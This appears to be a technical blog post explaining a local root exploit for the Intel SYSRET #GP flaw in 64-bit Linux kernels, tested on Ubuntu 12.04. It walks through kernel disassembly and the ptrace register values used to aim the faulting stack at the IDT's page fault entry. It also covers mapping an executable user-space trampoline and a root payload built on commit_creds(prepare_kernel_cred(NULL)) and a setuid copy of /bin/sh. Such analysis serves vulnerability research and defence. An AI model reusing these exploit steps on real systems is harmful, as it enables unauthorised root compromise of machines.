I believe this bug was first discovered around 2005 and affected a number of operating systems (not just Linux) on Intel 64-bit CPUs. The bug lies in how 64-bit kernels use the SYSRET instruction in the system call exit path. Unlike its slower alternative IRET, SYSRET does not pop a full return frame off the stack: it takes the return address from %rcx and the flags from %r11, loads fixed segment selectors, and leaves %rsp untouched. This is why it's faster than IRET. I've released the PoC code (on Twitter last week) that triggers the #GP in SYSRET and overwrites the #PF handler, transferring the execution flow to a NOP sled mapped at a specific memory address in user-space. The following is my attempt to explain how this vulnerability is triggered.
First, let's take a step back to see what the SYSRET instruction actually does. According to AMD, SYSRET does the following:
- Load the instruction pointer (%rip) from %rcx
- Change the code segment selector to user mode (this effectively changes the privilege level)
and this is exactly what it does on both Intel and AMD platforms. However, the two platforms differ when a general protection fault (#GP) is triggered. This fault is triggered if a non-canonical memory address ends up in %rcx upon executing the SYSRET instruction (since SYSRET loads %rip from %rcx). What is a non-canonical address? There are a few good explanations on the web; in short, on CPUs with 48-bit virtual addresses, an address is canonical only if bits 63 through 47 are all zeros or all ones. On AMD architectures, %rip is not assigned until after the privilege level has been changed back to user mode (and a #GP in user-space is not very interesting). However, on Intel architectures, the #GP fault is thrown in privileged mode (ring0). This also means that the current %rsp value is used in handling the #GP! Since SYSRET does not restore %rsp, the kernel has to perform this operation prior to executing SYSRET. By the time the #GP happens, the kernel has already loaded %rsp with the user-space stack pointer. In summary, this means that if we can trigger #GP in SYSRET:
- #GP will execute in privileged mode
- #GP will use the stack pointer supplied by us from user-space
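To make the canonical-address condition concrete, here is a minimal sketch of the check in C. It assumes 48-bit virtual addresses (4-level paging), where bits 63..47 must all be equal. The names `is_canonical` and `canonical_examples` are made up for illustration and are not part of the PoC.

```c
#include <assert.h>
#include <stdbool.h>
#include <stdint.h>

/* Assumption: 48-bit virtual addresses (4-level paging). */
#define VA_BITS 48

/* An address is canonical if bits 63..47 are all zeros or all ones. */
static bool is_canonical(uint64_t addr)
{
    uint64_t top = addr >> (VA_BITS - 1);                     /* bits 63..47 */
    uint64_t all_ones = (1ULL << (64 - (VA_BITS - 1))) - 1;   /* 17 one bits */
    return top == 0 || top == all_ones;
}

/* A few sample addresses on both sides of the canonical boundary. */
static void canonical_examples(void)
{
    assert(is_canonical(0x00007fffffffffffULL));   /* top of the lower half   */
    assert(!is_canonical(0x0000800000000000ULL));  /* first address in the hole */
    assert(is_canonical(0xffff800000000000ULL));   /* start of the upper half */
    assert(is_canonical(0xffffffff8165cba0ULL));   /* a kernel text address   */
}
```

Under this definition, an address such as 0x8fffffffffffffff is rejected, while ordinary user-space and kernel-space addresses pass.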
That's great, but how do we trigger the #GP fault in the first place? The %rip address loaded from %rcx would always be canonical. That's where ptrace comes into play. If you are not familiar with ptrace: in short, it is how debuggers stop a running process and let you change register values on the fly. Using ptrace we can change %rip and %rsp to arbitrary values. Most ptrace stops are delivered through the signal path, which always returns to user-space with IRET. However, there are a few paths that stop the process via ptrace_event() instead of the signal path, so the system call can still exit through SYSRET. Refer to the PoC code for an example of using ptrace to force such a path.
For the exploitation phase, I was using Ubuntu 12.04.0 LTS (3.2.0-23-generic) simply because that's what I had at the moment as my VM. I think it was mentioned that this issue would affect 2.6.x as well as 3.x branches.
To trigger the #GP fault in SYSRET we obviously need to set our %rip to a non-canonical address. In the PoC I'm using 0x8fffffffffffffff, but any non-canonical address would work. The next step is to set the %rsp value. If we set it to a user-space address, we'll simply double fault. However, if we set it to a writable address in kernel-space, the handler's stack writes will overwrite whatever data lives there.
Let's take a look at the general_protection handler that we enter with an arbitrary %rsp:
    0xffffffff8165cba0 <general_protection>     data32 xchg %ax,%ax
    0xffffffff8165cba3 <general_protection+3>   data32 xchg %ax,%ax
    0xffffffff8165cba6 <general_protection+6>   sub    $0x78,%rsp
    0xffffffff8165cbaa <general_protection+10>  callq  0xffffffff8165cd90 <error_entry>
    0xffffffff8165cbaf <general_protection+15>  mov    %rsp,%rdi
    0xffffffff8165cbb2 <general_protection+18>  mov    0x78(%rsp),%rsi
    0xffffffff8165cbb7 <general_protection+23>  movq   $0xffffffffffffffff,0x78(%rsp)
    0xffffffff8165cbc0 <general_protection+32>  callq  0xffffffff8165d040 <do_general_prote
    0xffffffff8165cbc5 <general_protection+37>  jmpq   0xffffffff8165ce30 <error_exit>
    0xffffffff8165cbca                          nopw   0x0(%rax,%rax,1)
    ...
When entering error_entry (called from general_protection+10), we overwrite a few entries on the stack:
    0xffffffff8165cd90 <error_entry>     cld
    0xffffffff8165cd91 <error_entry+1>   mov %rdi,0x78(%rsp)
    0xffffffff8165cd96 <error_entry+6>   mov %rsi,0x70(%rsp)
    0xffffffff8165cd9b <error_entry+11>  mov %rdx,0x68(%rsp)
    0xffffffff8165cda0 <error_entry+16>  mov %rcx,0x60(%rsp)
    0xffffffff8165cda5 <error_entry+21>  mov %rax,0x58(%rsp)
    0xffffffff8165cdaa <error_entry+26>  mov %r8,0x50(%rsp)
    0xffffffff8165cdaf <error_entry+31>  mov %r9,0x48(%rsp)
    0xffffffff8165cdb4 <error_entry+36>  mov %r10,0x40(%rsp)
    0xffffffff8165cdb9 <error_entry+41>  mov %r11,0x38(%rsp)
    0xffffffff8165cdbe <error_entry+46>  mov %rbx,0x30(%rsp)
    0xffffffff8165cdc3 <error_entry+51>  mov %rbp,0x28(%rsp)
    0xffffffff8165cdc8 <error_entry+56>  mov %r12,0x20(%rsp)
    0xffffffff8165cdcd <error_entry+61>  mov %r13,0x18(%rsp)
    0xffffffff8165cdd2 <error_entry+66>  mov %r14,0x10(%rsp)
    0xffffffff8165cdd7 <error_entry+71>  mov %r15,0x8(%rsp)
    ...
However, we can control almost all of these registers using PTRACE_SETREGS (see the PoC for details):
    // get current registers
    ptrace(PTRACE_GETREGS, chld, NULL, &regs);
    // modify regs
    ...
    // set regs
    ptrace(PTRACE_SETREGS, chld, NULL, &regs);
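For readers who have not used these two requests before, the following is a harmless, self-contained round trip rather than anything from the PoC. It is a sketch that assumes x86-64 Linux with glibc's `struct user_regs_struct`; the function names are hypothetical. A child asks to be traced and stops itself, the parent rewrites %r15 in the stopped child, reads the registers back, and then kills the child.

```c
#include <assert.h>
#include <signal.h>
#include <stdint.h>
#include <sys/ptrace.h>
#include <sys/types.h>
#include <sys/user.h>
#include <sys/wait.h>
#include <unistd.h>

/*
 * Returns 1 if the value written to the child's %r15 reads back unchanged,
 * 0 if it does not, and -1 if ptrace could not be used in this environment.
 */
static int ptrace_roundtrip_r15(uint64_t value)
{
    pid_t chld = fork();
    if (chld < 0)
        return -1;

    if (chld == 0) {
        /* Child: ask to be traced, then stop so the parent can inspect us. */
        if (ptrace(PTRACE_TRACEME, 0, NULL, NULL) == -1)
            _exit(1);
        raise(SIGSTOP);
        _exit(0);
    }

    int status;
    if (waitpid(chld, &status, 0) != chld || !WIFSTOPPED(status))
        return -1;  /* the child exited instead of stopping */

    int result = -1;
    struct user_regs_struct regs, check;

    /* get current registers */
    if (ptrace(PTRACE_GETREGS, chld, NULL, &regs) == 0) {
        /* modify regs: only a scratch register, %rip and %rsp stay intact */
        regs.r15 = value;
        /* set regs, then read them back to confirm the change took effect */
        if (ptrace(PTRACE_SETREGS, chld, NULL, &regs) == 0 &&
            ptrace(PTRACE_GETREGS, chld, NULL, &check) == 0)
            result = (check.r15 == value);
    }

    /* The child never resumes; kill and reap it. */
    kill(chld, SIGKILL);
    waitpid(chld, &status, 0);
    return result;
}

/* Example use: the round trip should never report a mismatch. */
static void roundtrip_example(void)
{
    int r = ptrace_roundtrip_r15(0x1122334455667788ULL);
    assert(r != 0);  /* 1 on success, -1 if ptrace is unavailable here */
}
```

The same GETREGS / modify / SETREGS pattern applies to any field of `struct user_regs_struct`, including `rip` and `rsp`.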
The general_protection handler then invokes the do_general_protection function (the callq at general_protection+32):
    Dump of assembler code for function do_general_protection:
    0xffffffff8165d040 <+0>:   push   %rbp
    0xffffffff8165d041 <+1>:   mov    %rsp,%rbp
    0xffffffff8165d044 <+4>:   sub    $0x20,%rsp
    0xffffffff8165d048 <+8>:   mov    %rbx,-0x18(%rbp)
    0xffffffff8165d04c <+12>:  mov    %r12,-0x10(%rbp)
    0xffffffff8165d050 <+16>:  mov    %r13,-0x8(%rbp)
    0xffffffff8165d054 <+20>:  callq  0xffffffff816647c0 <mcount>
    0xffffffff8165d059 <+25>:  testb  $0x2,0x91(%rdi)
    0xffffffff8165d060 <+32>:  mov    %rdi,%r12
    0xffffffff8165d063 <+35>:  mov    %rsi,%r13
    0xffffffff8165d066 <+38>:  je     0xffffffff8165d06f <do_general_protection+47>
    0xffffffff8165d068 <+40>:  callq  *0xffffffff81c177d8
    0xffffffff8165d06f <+47>:  mov    %gs:0xc500,%rbx
    0xffffffff8165d078 <+56>:  testb  $0x3,0x88(%r12)
    0xffffffff8165d081 <+65>:  je     0xffffffff8165d140 <do_general_protection+256>
    ...
At do_general_protection+47, the kernel will page fault when accessing %gs:0xc500 (the kernel had already switched %gs back to the user-space base before SYSRET, and a fault taken in ring0 does not switch it again), then double fault and crash. The question now is: what can we do to prevent the kernel from crashing and possibly transfer the execution flow to our mapped memory region in user-space? Well, let's just overwrite the #PF (Page Fault) handler in the IDT (Interrupt Descriptor Table) with a memory address that we control. In the PoC code, I've mapped the following memory region in user-space:
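    /* 7 == PROT_READ|PROT_WRITE|PROT_EXEC, 0x32 == MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS */
    trampoline = mmap((void *)0x80000000, 0x10000000,
                      PROT_READ | PROT_WRITE | PROT_EXEC,
                      MAP_PRIVATE | MAP_ANONYMOUS | MAP_FIXED | MAP_POPULATE | MAP_GROWSDOWN,
                      -1, 0);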
We then set our regs.rsp = idt.addr + 14*16 + 8 + 0xb0 - 0x78, i.e., the IDT start address + the offset of the #PF entry (vector 14, where each entry is 16 bytes) + 8 bytes (we need to overwrite bits 32..63 of the handler offset in the #PF entry with 0) + some padding. The Intel developer's manual (Vol 3A) provides a good explanation of the IDT structure.
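The padding term can be sanity-checked with a little arithmetic. The sketch below is one reading of it, not something taken from the PoC: it assumes the CPU aligns %rsp to 16 bytes and pushes six quadwords (SS, RSP, RFLAGS, CS, RIP, error code) for the #GP, that general_protection then reserves 0x78 bytes, and that callq error_entry pushes an 8-byte return address. The IDT base used in the example is hypothetical, and the IDT is assumed to be page-aligned.

```c
#include <assert.h>
#include <stdint.h>

#define IDT_ENTRY_SIZE  16    /* bytes per 64-bit gate descriptor         */
#define PF_VECTOR       14    /* page fault vector                        */
#define HW_FRAME        0x30  /* SS, RSP, RFLAGS, CS, RIP, error code     */
#define HANDLER_RESERVE 0x78  /* sub $0x78,%rsp in general_protection     */
#define RETURN_ADDR     8     /* pushed by callq error_entry              */

/* regs.rsp exactly as the formula in the text computes it. */
static uint64_t poc_rsp(uint64_t idt_base)
{
    return idt_base + PF_VECTOR * IDT_ENTRY_SIZE + 8 + 0xb0 - 0x78;
}

/* Address written by "mov %reg,disp(%rsp)" inside error_entry. */
static uint64_t store_address(uint64_t fault_rsp, uint64_t disp)
{
    uint64_t rsp = fault_rsp & ~0xfULL;  /* CPU aligns the frame to 16 bytes */
    rsp -= HW_FRAME;                     /* exception frame pushed by the CPU */
    rsp -= HANDLER_RESERVE;              /* handler's own stack reservation   */
    rsp -= RETURN_ADDR;                  /* return address of the call        */
    return rsp + disp;
}

/* Worked example with a made-up, page-aligned IDT base. */
static void rsp_example(void)
{
    uint64_t idt = 0xffffffff81dd6000ULL;  /* hypothetical address */
    uint64_t pf_entry = idt + PF_VECTOR * IDT_ENTRY_SIZE;
    uint64_t rsp = poc_rsp(idt);

    assert(store_address(rsp, 0x78) == pf_entry + 8);  /* %rdi: upper half of #PF */
    assert(store_address(rsp, 0x70) == pf_entry);      /* %rsi: lower half of #PF */
    assert(store_address(rsp, 0x68) == pf_entry - 8);  /* %rdx: upper half of #GP */
}
```

Under these assumptions, 0xb0 - 0x78 = 0x38 is exactly the 0x30-byte exception frame plus the 8-byte return address, which is why the store of %rdi at 0x78(%rsp) lands on the upper quadword of the #PF entry and the remaining registers fill the entries below it.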
In the PoC code, the %rdi value (which is set to 0, regs.rdi = 0x0000000000000000) will overwrite bits 32..63 of the handler offset in the #PF entry, leaving us with a memory address that points to user-space. On my test VM, this address is 0x8165cbd0, which is why we've mapped our user-space memory region at 0x80000000.
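The effect of zeroing the upper half can be sketched in a few lines of C. The descriptor layout follows the 64-bit gate format in the Intel manual. The struct and function names are hypothetical, and the original #PF gate value used in the example (handler at 0xffffffff8165cbd0) is inferred from the addresses in this post rather than dumped from a live system.

```c
#include <assert.h>
#include <stdint.h>

/* A 64-bit IDT gate descriptor viewed as two quadwords. */
struct idt_gate {
    uint64_t lo;  /* offset 15..0, selector, IST, type, offset 31..16 */
    uint64_t hi;  /* offset 63..32 in the low dword, reserved above it */
};

/* Reassemble the handler address from its three pieces. */
static uint64_t gate_handler(struct idt_gate g)
{
    uint64_t off_15_0  = g.lo & 0xffff;
    uint64_t off_31_16 = (g.lo >> 48) & 0xffff;
    uint64_t off_63_32 = g.hi & 0xffffffffULL;
    return off_15_0 | (off_31_16 << 16) | (off_63_32 << 32);
}

/* Models error_entry storing %rdi = 0 over the upper quadword. */
static struct idt_gate zero_upper_quadword(struct idt_gate g)
{
    g.hi = 0;
    return g;
}

/* Worked example; the gate value is an assumption based on the post. */
static void pf_gate_example(void)
{
    struct idt_gate pf = { 0x81658e000010cbd0ULL, 0x00000000ffffffffULL };
    assert(gate_handler(pf) == 0xffffffff8165cbd0ULL);

    uint64_t hijacked = gate_handler(zero_upper_quadword(pf));
    assert(hijacked == 0x8165cbd0ULL);
    /* The result falls inside a 0x10000000-byte mapping at 0x80000000. */
    assert(hijacked >= 0x80000000ULL && hijacked < 0x90000000ULL);
}
```

Only the upper 32 bits of the handler address change, so the low 32 bits of the kernel's own page fault handler decide where in user-space the trampoline has to live.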
I should point out that it's important to set MAP_POPULATE when mapping this memory region so we don't trigger a #PF on accessing our mapped user-space address, i.e., a #PF will trigger a double fault in this case. Here's the excerpt from the mmap(2) man page:
MAP_POPULATE (since Linux 2.5.46) Populate (prefault) page tables for a mapping. For a file mapping, this causes read-ahead on the file. Later accesses to the mapping will not be blocked by page faults. MAP_POPULATE is supported for private mappings only since Linux 2.6.23.
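The prefaulting behaviour is easy to observe from user-space. The sketch below is not from the PoC: it maps a small anonymous region at a kernel-chosen address (no MAP_FIXED) and uses mincore(2) to count how many pages are resident immediately after mmap returns. The function name `resident_after_mmap` is made up for illustration.

```c
#define _DEFAULT_SOURCE
#include <assert.h>
#include <stddef.h>
#include <sys/mman.h>
#include <unistd.h>

/* Returns the number of resident pages right after mapping, or -1 on error. */
static long resident_after_mmap(size_t npages, int extra_flags)
{
    long page = sysconf(_SC_PAGESIZE);
    size_t len = npages * (size_t)page;
    unsigned char vec[64];  /* one residency byte per page */

    assert(npages > 0 && npages <= sizeof(vec));

    void *p = mmap(NULL, len, PROT_READ | PROT_WRITE,
                   MAP_PRIVATE | MAP_ANONYMOUS | extra_flags, -1, 0);
    if (p == MAP_FAILED)
        return -1;

    long resident = -1;
    if (mincore(p, len, vec) == 0) {
        resident = 0;
        for (size_t i = 0; i < npages; i++)
            resident += vec[i] & 1;  /* bit 0 set means the page is in memory */
    }

    munmap(p, len);
    return resident;
}
```

Calling `resident_after_mmap(16, MAP_POPULATE)` should report all 16 pages as resident before anything has touched them, which is the property the trampoline mapping relies on.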
Once the #PF is triggered, we'll land in our NOP sled. However, by that time, the IDT will be trashed. We've overwritten a few entries in the IDT, including a number of critical handlers. In the PoC, there is an attempt to restore the IDT by setting the register values (rdx, etc.) to the original values:
    regs.rdi = 0x0000000000000000;
    regs.rsi = 0x81658e000010cbd0;
    regs.rdx = 0x00000000ffffffff;
    regs.rcx = 0x81658e000010cba0;
    regs.rax = 0x00000000ffffffff;
    regs.r8  = 0x81658e010010cb00;
    regs.r9  = 0x00000000ffffffff;
    regs.r10 = 0x81668e0000106b10;
    regs.r11 = 0x00000000ffffffff;
    regs.rbx = 0x81668e0000106ac0;
    regs.rbp = 0x00000000ffffffff;
    regs.r12 = 0x81668e0000106ac0;
    regs.r13 = 0x00000000ffffffff;
    regs.r14 = 0x81668e0200106a90;
    regs.r15 = 0x00000000ffffffff;
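These constants are easier to read once they are decoded as the low quadwords of 64-bit IDT gate descriptors. The decoder below is a sketch based on the gate layout in the Intel manual; the struct and function names are hypothetical, and reading the register values as gate descriptors is an interpretation of the PoC rather than something it states.

```c
#include <assert.h>
#include <stdint.h>

/* Fields held in the low quadword of a 64-bit IDT gate descriptor. */
struct gate_low {
    uint16_t offset_15_0;   /* handler address bits 15..0  */
    uint16_t selector;      /* code segment selector       */
    uint8_t  ist;           /* interrupt stack table index */
    uint8_t  type_attr;     /* P, DPL and gate type        */
    uint16_t offset_31_16;  /* handler address bits 31..16 */
};

static struct gate_low decode_gate_low(uint64_t lo)
{
    struct gate_low g;
    g.offset_15_0  = (uint16_t)(lo & 0xffff);
    g.selector     = (uint16_t)((lo >> 16) & 0xffff);
    g.ist          = (uint8_t)((lo >> 32) & 0x7);
    g.type_attr    = (uint8_t)((lo >> 40) & 0xff);
    g.offset_31_16 = (uint16_t)((lo >> 48) & 0xffff);
    return g;
}

/* True if the descriptor is a present 64-bit interrupt gate (type 0xE). */
static int is_present_interrupt_gate(struct gate_low g)
{
    return (g.type_attr & 0x80) != 0 && (g.type_attr & 0x0f) == 0x0e;
}

/* Worked example: regs.rsi decodes to a gate whose handler ends in 0x8165cbd0. */
static void check_poc_rsi(void)
{
    struct gate_low g = decode_gate_low(0x81658e000010cbd0ULL);
    assert(g.offset_15_0 == 0xcbd0 && g.offset_31_16 == 0x8165);
    assert(g.selector == 0x0010 && g.ist == 0);
    assert(is_present_interrupt_gate(g));
}
```

Decoded this way, the alternating 0x00000000ffffffff values are the upper quadwords (handler bits 63..32 plus a zeroed reserved field), and the values in r8 and r14 differ from the others mainly in their IST index (1 and 2).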
This code is obviously very kernel-specific. In the payload, we can then do the usual privilege escalation routine, commit_creds(prepare_kernel_cred(NULL)), followed by some syscall execution (e.g., setuid(0); cp /bin/sh .; chown root:root ./sh; chmod u+s ./sh). Or we could attempt to set the appropriate registers and IRET to user-space with a stack pointer of our choice.
There are a few things to note here. The PoC is very kernel-specific. Trashing the IDT is not a good approach (i.e., it affects kernel stability). Since 3.10.x the IDT is read-only, so this approach would no longer work. There are other kernel structs that can be overwritten that would give us a more reliable (and somewhat more universal) way of exploitation.